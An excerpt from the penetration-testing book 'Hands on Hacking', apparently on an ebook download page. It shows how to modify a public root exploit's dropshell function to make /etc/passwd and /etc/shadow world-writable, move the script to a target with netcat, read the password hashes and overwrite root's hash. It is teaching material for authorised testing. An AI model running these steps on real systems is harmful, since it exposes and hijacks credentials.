Hands on Hacking by Matthew Hickey

Author:Matthew Hickey
Language: eng
Format: epub
ISBN: 9781119561514
Publisher: Wiley
Published: 2020-08-11T00:00:00+00:00

Inside the highlighted dropshell function are commands that are run with root permissions. This part of the exploit will work as expected, and it is actually possible to run any code as the root user at this point in the program. As you will now know, there are certainly plenty of possibilities when you're able to execute code as root.

So, why not modify the dropshell function to change the permissions of the /etc/passwd and /etc/shadow files or add the -p argument to the shell to preserve root privileges? Sometimes, you will find that you have to modify a public exploit to get code to function or to tailor it to a specific client's system. This is just one basic example of modifying an exploit. You should edit the script so that the dropshell function looks like this:

void dropshell(void){ chown("/tmp/rootshell", 0, 0); chmod("/tmp/rootshell", 04755); unlink("/etc/ld.so.preload"); chmod ("/etc/passwd", 0777); // added this line chmod ("/etc/shadow", 0777); // and this one! printf("[+] done!\n"); }

Notice the two additional lines that change the file permissions on the passwd and shadow files. The rest of the code can be left as is. You will now need to get the script file onto the remote host. You can do this using Netcat, as in the previous chapter.

Use the following command on your Kali Linux machine:

nc -v -l -p 80 < screen.sh

On the target hosts, use the following command:

nc <KaliLinuxIP> 80> screen.sh

Remember that Netcat won't automatically terminate once the file transfer is complete or give you any indication that a transfer is in progress. Once you believe that the file has transferred (by waiting a sufficient amount of time), you can disconnect. Also be sure to use the correct IP address for your Kali Linux box.

You might also find that you cannot simply write to any folder on the target host. You can almost always write to the /tmp directory or find a suitable location with a little exploration. Make sure that this is your current working directory before attempting to write screen.sh to the target system. Once you have successfully transferred the script, you will need to make it executable with chmod +x screen.sh. Finally, you can run the script using ./screen.sh.

You should find that the passwd and shadow files are now readable by any user. cat /etc/passwd and cat /etc/shadow will output all usernames and their corresponding password hashes. You could attempt to crack these hashes now, but here's another little trick for you to try: Why not rewrite the root user's password hash with a different hash—one for which you know the password?

NOTE Before making any changes to files on a client's machine, the client should make backups. After you have made changes to a client's files and achieved your objective, be sure to return the files to their original state.

Download

Copyright Disclaimer:
This site does not store any files on its server. We only index and link to content provided by other sites. Please contact the content providers to delete copyright contents if any and email us, we'll remove relevant links or contents immediately.